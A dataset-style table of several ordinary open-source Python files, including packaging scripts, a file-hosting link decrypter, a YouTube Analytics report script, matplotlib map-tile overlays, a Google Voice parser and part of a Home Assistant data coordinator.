code stringlengths 3 1.05M | repo_name stringlengths 5 104 | path stringlengths 4 251 | language stringclasses 1 value | license stringclasses 15 values | size int64 3 1.05M |
|---|---|---|---|---|---|
#!/usr/bin/env python
# setuptools packaging script for the Athos project core.

from setuptools import setup, find_packages

# get requirements.txt -- runtime dependencies are maintained in one place
# (requirements.txt) and read here at build time, one requirement per line.
with open('requirements.txt') as f:
    required = f.read().splitlines()

setup(name='athos-core',
      description = 'Athos project core',
      url = 'https://github.com/AthosOrg/',
      packages = find_packages(),
      # console entry point: the `athos-core` command runs athos.cmd:main
      entry_points = {
          'console_scripts': [
              'athos-core=athos.cmd:main'
          ]
      },
      install_requires = required,
      # ship the default configuration file inside the package
      package_data = {'athos': ['default.yml']}
) | AthosOrg/athos-core | setup.py | Python | mit | 491 |
"""
Describes additional properties of cobbler fields otherwise
defined in item_*.py. These values are common to all versions
of the fields, so they don't have to be repeated in each file.
Copyright 2009, Red Hat, Inc
Michael DeHaan <mdehaan@redhat.com>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
02110-1301 USA
"""
# fields that display as a text area in the web app
# note: not the same as a text field, this is the big one.
USES_TEXTAREA = [
    "comment",
    "mgmt_classes",
    "template_files"
]

# fields that use a multi select in the web app
USES_MULTI_SELECT = [
    "repos"
]

# fields that use a select in the web app
# NOTE(review): names prefixed with "*" appear to denote per-interface
# variants of a field -- confirm against the item_*.py definitions.
USES_SELECT = [
    "profile",
    "distro",
    "image",
    "virt_type",
    "arch",
    "*bonding",
    "parent",
    "breed",
    "os_version",
]

# fields that should use the checkbox in the web app
USES_CHECKBOX = [
    "enable_menu",
    "*netboot_enabled",
    "netboot_enabled",
    "*static",
    "keep_updated",
    "mirror_locally",
    "virt_auto_boot"
]

# select killed the radio button
# we should not make anything use a radio button, we hate radio buttons.
USES_RADIO = [
]

# this is the map of what color to color code each field type.
# it may also be used to expand/collapse certain web elements as a set.
# Maps field name -> display group/section label in the web UI.
BLOCK_MAPPINGS = {
    "virt_ram": "Virtualization",
    "virt_disk": "Virtualization",
    "virt_cpus": "Virtualization",
    "virt_bridge": "Virtualization",
    "virt_path": "Virtualization",
    "virt_file_size": "Virtualization",
    "virt_type": "Virtualization",
    "virt_auto_boot": "Virtualization",
    "virt_host": "Virtualization",
    "virt_group": "Virtualization",
    "virt_guests": "Virtualization",
    "*virt_ram": "Virtualization",
    "*virt_disk": "Virtualization",
    "*virt_path": "Virtualization",
    "*virt_cpus": "Virtualization",
    # the per-interface bridge belongs with the other interface settings
    "*virt_bridge": "Networking",
    "*virt_type": "Virtualization",
    "*virt_file_size": "Virtualization",
    "power_id": "Power",
    "power_address": "Power",
    "power_user": "Power",
    "power_pass": "Power",
    "power_type": "Power",
    "address": "Networking",  # from network
    "cidr": "Networking",  # ditto
    "broadcast": "Networking",  # ..
    "reserved": "Networking",  # ..
    "*mac_address": "Networking",
    "*ip_address": "Networking",
    "*dhcp_tag": "Networking",
    "*static": "Networking",
    "*bonding": "Networking",
    "*bonding_opts": "Networking",
    "*bonding_master": "Networking",
    "*dns_name": "Networking",
    "*static_routes": "Networking",
    "*subnet": "Networking",
    "hostname": "Networking (Global)",
    "gateway": "Networking (Global)",
    "name_servers": "Networking (Global)",
    "name_servers_search": "Networking (Global)",
    "repos": "General",
    "dhcp_tag": "Advanced",
    "mgmt_classes": "Management",
    "template_files": "Management",
    "network_widget_a": "Networking",
    "network_widget_b": "Networking",
    "server": "Advanced",
    "redhat_management_key": "Management",
    "redhat_management_server": "Management",
    "createrepo_flags": "Advanced",
    "environment": "Advanced",
    "mirror_locally": "Advanced",
    "priority": "Advanced",
    "yumopts": "Advanced"
}

# Certain legacy fields need to have different CLI options than the direct translation of their
# name in the FIELDS data structure. We should not add any more of these under any conditions.
ALTERNATE_OPTIONS = {
    "ks_meta": "--ksmeta",
    "kernel_options": "--kopts",
    "kernel_options_post": "--kopts-post",
}
| ssalevan/cobbler | cobbler/field_info.py | Python | gpl-2.0 | 4,454 |
# -*- coding: utf-8 -*-
import re
from ..base.decrypter import BaseDecrypter
class UlozToFolder(BaseDecrypter):
    """Uloz.to folder decrypter: collects every file link in a folder.

    Walks the folder's paginated listing (up to 99 pages) and publishes
    all discovered file URLs via ``self.links``.
    """

    __name__ = "UlozToFolder"
    __type__ = "decrypter"
    __version__ = "0.28"
    __status__ = "testing"

    __pattern__ = r"http://(?:www\.)?(uloz\.to|ulozto\.(cz|sk|net)|bagruj\.cz|zachowajto\.pl)/(m|soubory)/.+"
    __config__ = [
        ("enabled", "bool", "Activated", True),
        ("use_premium", "bool", "Use premium account if available", True),
        (
            "folder_per_package",
            "Default;Yes;No",
            "Create folder for each package",
            "Default",
        ),
    ]

    __description__ = """Uloz.to folder decrypter plugin"""
    __license__ = "GPLv3"
    __authors__ = [("zoidberg", "zoidberg@mujmail.cz")]

    #: section of the folder page that contains the file listing
    FOLDER_PATTERN = r'<ul class="profile_files">(.*?)</ul>'
    #: one file link inside the folder listing (relative URL in group 1)
    LINK_PATTERN = r'<br /><a href="/(.+?)">.+?</a>'
    #: "next page" link of the paginated listing (relative URL in group 1)
    NEXT_PAGE_PATTERN = r'<a class="next " href="/(.+?)"> </a>'

    def decrypt(self, pyfile):
        """Collect all file links of the folder, following pagination.

        Aborts with an error if the folder listing cannot be located;
        stops after 99 pages as a safety limit.
        """
        html = self.load(pyfile.url)
        new_links = []
        for i in range(1, 100):
            self.log_info(self._("Fetching links from page {}").format(i))
            m = re.search(self.FOLDER_PATTERN, html, re.S)
            if m is None:
                self.error(self._("FOLDER_PATTERN not found"))

            new_links.extend(re.findall(self.LINK_PATTERN, m.group(1)))
            m = re.search(self.NEXT_PAGE_PATTERN, html)
            if m is not None:
                html = self.load("http://ulozto.net/" + m.group(1))
            else:
                break
        else:
            self.log_info(self._("Limit of 99 pages reached, aborting"))

        if new_links:
            # BUGFIX: self.links must be a flat list of URLs; the previous
            # code wrapped the list comprehension in an extra list.
            self.links = ["http://ulozto.net/{}".format(s) for s in new_links]
| vuolter/pyload | src/pyload/plugins/decrypters/UlozToFolder.py | Python | agpl-3.0 | 1,771 |
__author__ = 'Pat McClernan and Dan Weggman'

# Move encoding:
#   0 = rock, 1 = paper, 2 = scissors
#
# Strategy: count how often each move has been observed.  Over many games
# each move should appear roughly equally often, so we assume the least-seen
# move is "due" to show up soon, and we play the move that beats it.


class my_rps_player:
    """Rock-paper-scissors player that counters the least-observed move."""

    def __init__(self):
        # BUGFIX: the counters were previously assigned to local variables
        # (``rock = 0`` ...), so my_rps_play() raised AttributeError.
        self.rock = 0
        self.paper = 0
        self.scissors = 0

    def my_rps_play(self):
        """Return our next move (0/1/2).

        Picks the least-seen move so far and returns the move that beats it
        (paper beats rock, scissors beats paper, rock beats scissors).
        Ties resolve toward the later move in the 0/1/2 ordering.
        """
        # determine which move has been seen least
        if (self.rock < self.paper) and (self.rock < self.scissors):
            least_seen = 0
        elif self.paper < self.scissors:
            least_seen = 1
        else:
            least_seen = 2
        # (x + 1) % 3 is the move that beats x; debug print removed
        return (least_seen + 1) % 3

    def add_moves(self, moves):
        """Update the observation counters from an iterable of moves (0/1/2)."""
        for this_move in list(moves):
            if this_move == 0:
                self.rock += 1
            elif this_move == 1:
                self.paper += 1
            elif this_move == 2:
                self.scissors += 1

    def reset_moves(self):
        """Clear all observation counters."""
        self.rock = 0
        self.paper = 0
        self.scissors = 0
| mccler89/RPS_Player | my_rps_player.py | Python | apache-2.0 | 1,272 |
#!/usr/bin/python
from datetime import datetime, timedelta
import httplib2
import os
import sys
import pandas as pd
from pprint import pprint as pp
from apiclient.discovery import build
from apiclient.errors import HttpError
from oauth2client.client import flow_from_clientsecrets
from oauth2client.file import Storage
from oauth2client.tools import argparser, run_flow
# The CLIENT_SECRETS_FILE variable specifies the name of a file that contains
# the OAuth 2.0 information for this application, including its client_id and
# client_secret. You can acquire an OAuth 2.0 client ID and client secret from
# the Google Developers Console at
# https://console.developers.google.com/.
# Please ensure that you have enabled the YouTube Data and YouTube Analytics
# APIs for your project.
# For more information about using OAuth2 to access the YouTube Data API, see:
# https://developers.google.com/youtube/v3/guides/authentication
# For more information about the client_secrets.json file format, see:
# https://developers.google.com/api-client-library/python/guide/aaa_client_secrets
CLIENT_SECRETS_FILE = "client_secrets.json"
# These OAuth 2.0 access scopes allow for read-only access to the authenticated
# user's account for both YouTube Data API resources and YouTube Analytics Data.
YOUTUBE_SCOPES = ["https://www.googleapis.com/auth/youtube.readonly",
"https://www.googleapis.com/auth/yt-analytics.readonly"]
YOUTUBE_API_SERVICE_NAME = "youtube"
YOUTUBE_API_VERSION = "v3"
YOUTUBE_ANALYTICS_API_SERVICE_NAME = "youtubeAnalytics"
YOUTUBE_ANALYTICS_API_VERSION = "v1"
# This variable defines a message to display if the CLIENT_SECRETS_FILE is
# missing.
MISSING_CLIENT_SECRETS_MESSAGE = """
WARNING: Please configure OAuth 2.0
To make this sample run you will need to populate the client_secrets.json file
found at:
%s
with information from the Developers Console
https://console.developers.google.com/
For more information about the client_secrets.json file format, please visit:
https://developers.google.com/api-client-library/python/guide/aaa_client_secrets
""" % os.path.abspath(os.path.join(os.path.dirname(__file__),
CLIENT_SECRETS_FILE))
def get_authenticated_services(args):
    """Run the OAuth2 flow (reusing cached credentials when valid) and
    return a ``(youtube, youtube_analytics)`` pair of API clients."""
    flow = flow_from_clientsecrets(
        CLIENT_SECRETS_FILE,
        scope=" ".join(YOUTUBE_SCOPES),
        message=MISSING_CLIENT_SECRETS_MESSAGE,
    )

    # Credentials are cached next to the script in "<script>-oauth2.json".
    storage = Storage("%s-oauth2.json" % sys.argv[0])
    credentials = storage.get()
    if credentials is None or credentials.invalid:
        credentials = run_flow(flow, storage, args)

    authorized_http = credentials.authorize(httplib2.Http())
    data_api = build(
        YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION, http=authorized_http
    )
    analytics_api = build(
        YOUTUBE_ANALYTICS_API_SERVICE_NAME,
        YOUTUBE_ANALYTICS_API_VERSION,
        http=authorized_http,
    )
    return (data_api, analytics_api)
def get_channel_id(youtube):
    """Return the channel id of the authenticated user's own channel."""
    response = youtube.channels().list(mine=True, part="id").execute()
    return response["items"][0]["id"]
def run_analytics_report(youtube_analytics, channel_id, options):
    """Run a YouTube Analytics report for *channel_id*.

    Query parameters (metrics, dimensions, date range, max results, sort)
    are taken from the parsed CLI *options*.  Returns a tuple
    ``(rows, column_headers)`` from the API response.  For the available
    reports see:
    https://developers.google.com/youtube/analytics/v1/channel_reports
    """
    analytics_query_response = youtube_analytics.reports().query(
        ids="channel==%s" % channel_id,
        metrics=options.metrics,
        dimensions=options.dimensions,
        start_date=options.start_date,
        end_date=options.end_date,
        max_results=options.max_results,
        sort=options.sort
    ).execute()

    # print() call form works on both Python 2 and 3 (the original used
    # the Python 2 print statement, a syntax error under Python 3).
    print("Analytics Data for Channel %s" % channel_id)
    pp(analytics_query_response)

    headers = analytics_query_response.get("columnHeaders", [])
    analytics_results = analytics_query_response.get("rows")
    pp(analytics_results)
    pp(headers)
    return analytics_results, headers
if __name__ == "__main__":
    # Default reporting window: the last 150 days, ending yesterday.
    now = datetime.now()
    start = (now - timedelta(days=150)).strftime("%Y-%m-%d")
    end = (now - timedelta(days=1)).strftime("%Y-%m-%d")

    argparser.add_argument("--metrics", help="Report metrics",
                           default="views,averageViewDuration,averageViewPercentage")
    argparser.add_argument("--dimensions", help="Report dimensions",
                           default="subscribedStatus")
    argparser.add_argument("--start-date", default=start,
                           help="Start date, in YYYY-MM-DD format")
    argparser.add_argument("--end-date", default=end,
                           help="End date, in YYYY-MM-DD format")
    argparser.add_argument("--max-results", help="Max results", default=90)
    argparser.add_argument("--sort", help="Sort order", default="-views")
    args = argparser.parse_args()

    (youtube, youtube_analytics) = get_authenticated_services(args)
    try:
        channel_id = get_channel_id(youtube)
        analytics_results, headers = run_analytics_report(
            youtube_analytics, channel_id, args)
        df_total_views = pd.DataFrame(
            analytics_results,
            columns=["views", "averageViewDuration", "averageViewPercentage"])
        # total watch time = views * average view duration (per row)
        df_total_views.loc[:, "totalWatchTime"] = (
            df_total_views["views"] * df_total_views["averageViewDuration"])
        df_total_views.to_csv("Youtube Net Subscribers.csv")
    # BUGFIX: "except HttpError, e" is Python-2-only syntax; "as" works on
    # Python 2.6+ and Python 3.  print() form likewise works on both.
    except HttpError as e:
        print("An HTTP error %d occurred:\n%s" % (e.resp.status, e.content))
| facemelters/data-science | Atlas/test-youtube.py | Python | gpl-2.0 | 5,599 |
# (C) British Crown Copyright 2010 - 2016, Met Office
#
# This file is part of Iris.
#
# Iris is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Iris is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Iris. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
from six.moves import (filter, input, map, range, zip) # noqa
# Import Iris tests first so that some things can be initialised before
# importing anything else.
import iris.tests as tests
from .extest_util import (add_examples_to_path,
show_replaced_by_check_graphic,
fail_any_deprecation_warnings)
class TestCOPMaps(tests.GraphicsTest):
    """Test the COP_maps example code."""

    def test_cop_maps(self):
        """Import and run the COP_maps example, checking its graphics output."""
        with fail_any_deprecation_warnings(), add_examples_to_path():
            import COP_maps
            with show_replaced_by_check_graphic(self):
                COP_maps.main()


if __name__ == '__main__':
    tests.main()
| QuLogic/iris | docs/iris/example_tests/test_COP_maps.py | Python | gpl-3.0 | 1,504 |
# -*- coding: utf-8 -*-
"""Overlay / Underlay an image or a geo referenced map to mpl.axes"""
import os
import math
import random
import matplotlib.image as mpimg
import numpy as np
import urllib
class OverlayImageMPL(object):
    """Overlay a raster image on a matplotlib axes at a data position.

    The image is loaded from disk and placed in its own small axes whose
    figure-relative position tracks a point in the parent axes' data
    coordinates (see :meth:`setPosition`).
    """

    def __init__(self, imageFileName, axes):
        """Load *imageFileName* and bind the overlay to *axes*."""
        self.axes = axes
        self.imAxes = None
        # BUGFIX: matplotlib.image has no open(); imread() loads the file
        # into an ndarray of shape (rows, cols[, channels]).
        self.image = mpimg.imread(imageFileName)
        self.figure = self.axes.get_figure()

    def clear(self):
        """Remove the overlay axes from the figure, if present."""
        if self.imAxes in self.figure.axes:
            self.figure.delaxes(self.imAxes)

    def setPosition(self, posX, posY, axes=None):
        """Place the overlay so it appears at data coordinates (posX, posY)."""
        if axes is not None:
            self.axes = axes

        # image size in figure-relative units (fraction of the figure)
        imHeight = self.image.shape[0]
        imWidth = self.image.shape[1]
        self.dx = float(imWidth) / \
            self.figure.get_dpi() / self.figure.get_size_inches()[0]
        # BUGFIX: dy previously used the image width as well; the vertical
        # extent must come from the image height.
        self.dy = float(imHeight) / \
            self.figure.get_dpi() / self.figure.get_size_inches()[1]

        # data coordinates -> axes fraction -> figure fraction
        xRange = self.axes.get_xlim()[1] - self.axes.get_xlim()[0]
        yRange = self.axes.get_ylim()[1] - self.axes.get_ylim()[0]
        x = (posX - self.axes.get_xlim()[0]) / xRange
        y = (posY - self.axes.get_ylim()[0]) / yRange
        x *= (self.axes.get_position().x1 - self.axes.get_position().x0)
        y *= (self.axes.get_position().y1 - self.axes.get_position().y0)

        if self.imAxes not in self.figure.axes:
            if (x + self.axes.get_position().x0) > 10:
                # sanity guard against absurd positions (hackish diagnostics)
                print(("overlay size out of range",
                       (x + self.axes.get_position().x0)))
                print((posX, posY))
                print((xRange, yRange))
                print((x, y))
                print((self.axes.get_position().x0,
                       self.axes.get_position().x1))
                print((self.figure.get_size_inches()))
                print(("add axes",
                       [x + self.axes.get_position().x0 - self.dx / 6.0,
                        y + self.axes.get_position().y0, self.dx, self.dy]))
                return
            # NOTE(review): axisbg was removed in newer matplotlib releases
            # in favour of facecolor -- kept here for the versions this
            # project targets; confirm before upgrading matplotlib.
            self.imAxes = self.figure.add_axes([
                x + self.axes.get_position().x0 - self.dx / 6.0,
                y + self.axes.get_position().y0,
                self.dx, self.dy],
                frameon=False, axisbg='y')
        else:
            self.imAxes.set_position([
                x + self.axes.get_position().x0 - self.dx / 6.0,
                y + self.axes.get_position().y0,
                self.dx, self.dy])

        # only draw the image once (ticks are cleared after the first draw)
        if (len(self.imAxes.get_xticks()) > 0):
            print("overlay imshow")
            self.imAxes.imshow(self.image, origin='lower')
            self.imAxes.set_xticks([])
            self.imAxes.set_yticks([])
def deg2MapTile(lon_deg, lat_deg, zoom):
    """Convert WGS84 lon/lat (degrees) to slippy-map tile indices at *zoom*."""
    n_tiles = 2.0 ** zoom
    x = int((lon_deg + 180.0) / 360.0 * n_tiles)
    lat = math.radians(lat_deg)
    # spherical-mercator y coordinate of the latitude
    mercator = math.log(math.tan(lat) + (1 / math.cos(lat)))
    y = int((1.0 - mercator / math.pi) / 2.0 * n_tiles)
    return (x, y)
def mapTile2deg(xtile, ytile, zoom):
    """
    Returns the NW-corner of the square.
    Use the function with xtile+1 and/or ytile+1 to get the other corners.
    With xtile+0.5 ytile+0.5 it will return the center of the tile.
    """
    n_tiles = 2.0 ** zoom
    lon = xtile / n_tiles * 360.0 - 180.0
    # invert the spherical-mercator projection for the latitude
    merc_y = math.pi * (1 - 2 * ytile / n_tiles)
    lat = math.degrees(math.atan(math.sinh(merc_y)))
    return (lon, lat)
def cacheFileName(fullname, vendor):
    """Utility. Build (and ensure) the cache path './<vendor>/<dir>/<file>'."""
    dirName, fileName = os.path.split(fullname)
    cacheDir = './' + vendor + '/' + dirName
    try:
        os.makedirs(cacheDir)
    except OSError:
        # directory already exists (or cannot be created) -- best effort
        pass
    return cacheDir + '/' + fileName
def getMapTile(xtile, ytile, zoom, vendor='OSM', verbose=False):
    """
    Get a map tile from public mapping server.

    Downloaded tiles are cached on disk (see cacheFileName) and re-read
    from the cache on subsequent calls.

    Parameters
    ----------
    xtile : int
    ytile : int
    zoom : int
    vendor : str
        . 'OSM' or 'Open Street Map' (tile.openstreetmap.org)
        . 'GM' or 'Google Maps' (mt.google.com)
        . 'GMS' or 'Google Maps Satellite' (khm.google.com)
    verbose : bool [false]
        be verbose
    """
    imagename = str(zoom) + '/' + str(xtile) + '/' + str(ytile)

    if vendor == 'OSM' or vendor == 'Open Street Map':
        # http://[abc].tile.openstreetmap.org
        serverName = 'tile.openstreetmap.org'
        url = 'http://a.' + serverName + '/' + imagename + '.png'
        imFormat = '.png'
    elif vendor == 'GM' or vendor == 'Google Maps':
        # http://mt[0-3].google.com/vt/x=...&y=...&z=...
        serverName = 'mt.google.com'
        nr = random.randint(0, 3)
        url = 'http://mt' + str(nr) + '.google.com/vt/x=' + \
            str(xtile) + '&y=' + str(ytile) + '&z=' + str(zoom)
        imFormat = '.png'
    elif vendor == 'GMS' or vendor == 'Google Maps Satellite':
        serverName = 'khm.google.com'
        nr = random.randint(0, 3)
        url = 'http://khm' + str(nr) + '.google.com/kh/v=60&x=' + \
            str(xtile) + '&y=' + str(ytile) + '&z=' + str(zoom)
        imFormat = '.jpeg'
    else:
        # BUGFIX: raising a plain string is a TypeError on Python 3;
        # raise a proper exception type instead.
        raise ValueError(
            "Vendor: " + vendor +
            " not supported (currently only OSM (Open Street Map))")

    filename = cacheFileName(imagename, serverName) + imFormat
    if os.path.exists(filename):
        if verbose:
            print(("Read image from disk", filename))
        image = mpimg.imread(filename)
    else:
        # BUGFIX: "import urllib" alone does not guarantee that the
        # urllib.request submodule is loaded; import it explicitly.
        import urllib.request
        if verbose:
            print(("Get map from url maps", url))
        opener1 = urllib.request.build_opener()
        filehandle = opener1.open(url, timeout=15)
        data = filehandle.read()
        opener1.close()
        if verbose:
            print(imagename)
        # BUGFIX: the HTTP payload is bytes; write the cache file in
        # binary mode (text mode raises TypeError on Python 3).
        fi = open(filename, 'wb')
        fi.write(data)
        fi.close()
        image = mpimg.imread(filename)
        if imFormat == '.jpeg':
            # JPEG rows arrive flipped and as 0..255; normalise to 0..1
            image = image[::-1, ...] / 256.
    return image
# def getMapTile(...)
def underlayMap(axes, proj, vendor='OSM', zoom=-1, pixelLimit=None,
                verbose=False, fitMap=False):
    """
    Get a map from public mapping server and underlay it on the given axes

    Parameters
    ----------
    axes : matplotlib.axes
    proj : pyproy
        Proj Projection
    vendor : str
        . 'OSM' or 'Open Street Map' (tile.openstreetmap.org)
        . 'GM' or 'Google Maps' (mt.google.com)
    zoom : int [-1]
        Zoom level. If zoom is set to -1, the pixel size of the resulting
        image is lower than pixelLimit.
    pixelLimit : [int,int]
    verbose : bool [false]
        be verbose
    fitMap : bool
        The axes is resized to fit the whole map.
    """
    if pixelLimit is None:
        pixelLimit = [1024, 1024]

    # remember the current view so it can be restored unless fitMap is set
    origXLimits = axes.get_xlim()
    origYLimits = axes.get_ylim()

    # upper-left / lower-right corners of the view in lon/lat
    # (inverse projection from axes data coordinates)
    ul = proj(axes.get_xlim()[0], axes.get_ylim()[1], inverse=True)
    lr = proj(axes.get_xlim()[1], axes.get_ylim()[0], inverse=True)

    if zoom == -1:
        # auto-zoom: pick the highest zoom whose tile mosaic (256px tiles)
        # stays within pixelLimit
        nXtiles = 1e99
        nYtiles = 1e99
        zoom = 19
        while ((nYtiles * 256) > pixelLimit[0] or
               (nXtiles * 256) > pixelLimit[1]):
            zoom = zoom - 1
            startTile = deg2MapTile(ul[0], ul[1], zoom)
            endTile = deg2MapTile(lr[0], lr[1], zoom)
            nXtiles = (endTile[0] - startTile[0]) + 1
            nYtiles = (endTile[1] - startTile[1]) + 1
            if verbose:
                print(("tiles: ", zoom, nYtiles, nXtiles))
            if nXtiles == 1 and nYtiles == 1:
                break
        if verbose:
            print(("zoom set to ", zoom))

    startTile = deg2MapTile(ul[0], ul[1], zoom)
    endTile = deg2MapTile(lr[0], lr[1], zoom)
    nXtiles = (endTile[0] - startTile[0]) + 1
    nYtiles = (endTile[1] - startTile[1]) + 1

    # assemble the tiles into one RGB mosaic image
    image = np.zeros(shape=(256 * nYtiles, 256 * nXtiles, 3))
    if verbose:
        print(("Mapimage size:", image.shape))
    for i in range(nXtiles):
        for j in range(nYtiles):
            im = getMapTile(startTile[0] + i, startTile[1] + j,
                            zoom, vendor, verbose=verbose)
            image[(j * 256): ((j + 1) * 256),
                  (i * 256): ((i + 1) * 256)] = im

    # geographic extent of the mosaic, projected back to axes coordinates
    lonLatStart = mapTile2deg(startTile[0], startTile[1], zoom)
    lonLatEnd = mapTile2deg(endTile[0] + 1, endTile[1] + 1, zoom)
    imUL = proj(lonLatStart[0], lonLatStart[1])
    imLR = proj(lonLatEnd[0], lonLatEnd[1])
    extent = np.asarray([imUL[0], imLR[0], imLR[1], imUL[1]])

    axes.imshow(image, extent=extent)
    if not fitMap:
        # restore the original data view; the map extends beyond it
        axes.set_xlim(origXLimits)
        axes.set_ylim(origYLimits)
| KristoferHellman/gimli | python/pygimli/mplviewer/overlayimage.py | Python | gpl-3.0 | 8,769 |
from lxml.html import parse
from datetime import datetime, timedelta
from message import GoogleVoiceMessage
def messagesFromHTML(htmlfile):
    """Parse the contents of a Google Voice folder page.

    Returns a list of GoogleVoiceMessage objects: one per SMS in each SMS
    thread, and one per voicemail/missed-call thread.
    """

    def classContent(parent, cls):
        """
        find the element inside parent with the given class,
        and return the contents of that element,
        with padding whitespace removed
        """
        return parent.find_class(cls)[0].text_content().strip()

    elBody = parse(htmlfile).getroot()
    threads = elBody.find_class('gc-message')
    msgs = []

    # XXX extract my phone number from the page
    me = "+15033088413"
    me_name = "Me"

    for elThread in threads:
        thr = GoogleVoiceMessage()
        # thread id
        thr['thread_id'] = elThread.get('id')

        # labels can be extracted from the classes applied to this element
        thr['labels'] = []
        for maybe_label in elThread.get('class').split():
            if maybe_label.startswith('gc-message-'):
                label = maybe_label[len('gc-message-'):]
                thr['labels'].append(label)

        # datestring is MM/DD/YY HH:MM [AP]M
        # representing the *latest* message in the thread
        datestr = classContent(elThread, 'gc-message-time')
        thr['date'] = datetime.strptime(datestr, "%m/%d/%y %I:%M %p")

        # name is in a 'nobold' span in 'gc-message-name'
        thr['sender'] = classContent(elThread, 'gc-message-name')

        if 'sms' in thr['labels']:
            # this is an SMS conversation: one message per row
            elMessages = elThread.find_class('gc-message-sms-row')
            for idx in range(len(elMessages)):
                elMessage = elMessages[idx]
                msg = GoogleVoiceMessage({
                    'thread_id': thr['thread_id'],
                    'message_num': idx,
                    'labels': thr['labels'],
                    'sender': classContent(elMessage,
                                           'gc-message-sms-from').strip(':'),
                    'content': classContent(elMessage, 'gc-message-sms-text'),
                })
                # add the message date; format is "HH:MM [AP]M"
                timestr = classContent(elMessage, 'gc-message-sms-time')
                # BUGFIX: %H is the 24-hour format code and ignores %p, so
                # all PM times were parsed 12 hours early; %I parses the
                # 12-hour clock correctly together with %p.
                tm = datetime.strptime(timestr, "%I:%M %p")
                msg['date'] = datetime.combine(thr['date'].date(), tm.time())
                if tm.time() > thr['date'].time():
                    # later clock time than the thread's latest message
                    # means the message is from the previous day
                    msg['date'] += timedelta(days=-1)
                # figure out who this message is to
                if msg['sender'] == me:
                    msg['recipient'] = thr.get('sender')
                    msg['recipient_name'] = thr.get('sender_name')
                else:
                    msg['recipient'] = me
                    msg['recipient_name'] = me_name
                msgs.append(msg)
        else:
            # incoming calls are always to me
            thr['recipient'] = me
            thr['recipient_name'] = me_name
            try:
                # a transcribed voice mail?
                thr['content'] = classContent(elThread, 'gc-edited-trans-text')
            except IndexError:
                # no...probably a missed call, then
                thr['content'] = 'Missed call'
            msgs.append(thr)
    return msgs
| mglover/gvoice-python | parsers.py | Python | gpl-2.0 | 3,478 |
"""Helpers to help coordinate updates."""
import asyncio
from datetime import datetime, timedelta
import logging
from time import monotonic
from typing import Awaitable, Callable, Generic, List, Optional, TypeVar
import urllib.error
import aiohttp
import requests
from homeassistant.core import CALLBACK_TYPE, HomeAssistant, callback
from homeassistant.helpers import entity, event
from homeassistant.util.dt import utcnow
from .debounce import Debouncer
REQUEST_REFRESH_DEFAULT_COOLDOWN = 10
REQUEST_REFRESH_DEFAULT_IMMEDIATE = True
T = TypeVar("T")
# Raised by update methods (or _async_update_data overrides) to signal a
# failed fetch; DataUpdateCoordinator catches it and logs once per outage.
class UpdateFailed(Exception):
    """Raised when an update has failed."""
class DataUpdateCoordinator(Generic[T]):
    """Class to manage fetching data from single endpoint.

    Fetches via *update_method* (or an overridden ``_async_update_data``),
    stores the result in ``self.data``, and notifies registered listeners
    after every refresh.  Periodic refreshes are scheduled only while at
    least one listener is registered.
    """

    def __init__(
        self,
        hass: HomeAssistant,
        logger: logging.Logger,
        *,
        name: str,
        update_interval: Optional[timedelta] = None,
        update_method: Optional[Callable[[], Awaitable[T]]] = None,
        request_refresh_debouncer: Optional[Debouncer] = None,
    ):
        """Initialize global data updater.

        Args:
            hass: Home Assistant instance.
            logger: logger used for all fetch/error reporting.
            name: human-readable name used in log messages.
            update_interval: period between scheduled refreshes; None
                disables automatic scheduling.
            update_method: coroutine function that fetches the data; if
                omitted, ``_async_update_data`` must be overridden.
            request_refresh_debouncer: optional custom debouncer for
                ``async_request_refresh``; its function is rebound here.
        """
        self.hass = hass
        self.logger = logger
        self.name = name
        self.update_method = update_method
        self.update_interval = update_interval

        # Latest successfully fetched data (None until the first refresh).
        self.data: Optional[T] = None

        self._listeners: List[CALLBACK_TYPE] = []
        self._unsub_refresh: Optional[CALLBACK_TYPE] = None
        self._request_refresh_task: Optional[asyncio.TimerHandle] = None
        # True until a fetch fails; used to log each outage only once.
        self.last_update_success = True

        if request_refresh_debouncer is None:
            request_refresh_debouncer = Debouncer(
                hass,
                logger,
                cooldown=REQUEST_REFRESH_DEFAULT_COOLDOWN,
                immediate=REQUEST_REFRESH_DEFAULT_IMMEDIATE,
                function=self.async_refresh,
            )
        else:
            # Rebind a caller-supplied debouncer to our refresh method.
            request_refresh_debouncer.function = self.async_refresh

        self._debounced_refresh = request_refresh_debouncer

    @callback
    def async_add_listener(self, update_callback: CALLBACK_TYPE) -> Callable[[], None]:
        """Listen for data updates.

        Returns a callable that removes the listener again.
        """
        schedule_refresh = not self._listeners

        self._listeners.append(update_callback)

        # This is the first listener, set up interval.
        if schedule_refresh:
            self._schedule_refresh()

        @callback
        def remove_listener() -> None:
            """Remove update listener."""
            self.async_remove_listener(update_callback)

        return remove_listener

    @callback
    def async_remove_listener(self, update_callback: CALLBACK_TYPE) -> None:
        """Remove data update.

        Cancels the scheduled refresh when the last listener is removed.
        """
        self._listeners.remove(update_callback)

        if not self._listeners and self._unsub_refresh:
            self._unsub_refresh()
            self._unsub_refresh = None

    @callback
    def _schedule_refresh(self) -> None:
        """Schedule a refresh."""
        if self.update_interval is None:
            return

        # Cancel any previously scheduled refresh before re-arming.
        if self._unsub_refresh:
            self._unsub_refresh()
            self._unsub_refresh = None

        # We _floor_ utcnow to create a schedule on a rounded second,
        # minimizing the time between the point and the real activation.
        # That way we obtain a constant update frequency,
        # as long as the update process takes less than a second
        self._unsub_refresh = event.async_track_point_in_utc_time(
            self.hass,
            self._handle_refresh_interval,
            utcnow().replace(microsecond=0) + self.update_interval,
        )

    async def _handle_refresh_interval(self, _now: datetime) -> None:
        """Handle a refresh interval occurrence."""
